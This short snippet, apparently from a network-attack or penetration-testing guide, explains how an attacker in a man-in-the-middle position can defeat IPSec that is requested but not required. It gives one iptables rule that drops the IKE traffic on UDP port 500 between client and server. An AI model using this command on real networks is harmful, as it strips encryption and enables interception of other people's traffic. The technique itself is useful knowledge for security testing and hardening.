If the client and the server request IPSec, but do not require it,
it can be disabled by the attacker:

iptables -t nat -A PREROUTING -i eth0 -p udp -s <client ip> -d <server ip> --dport 500 -j DROP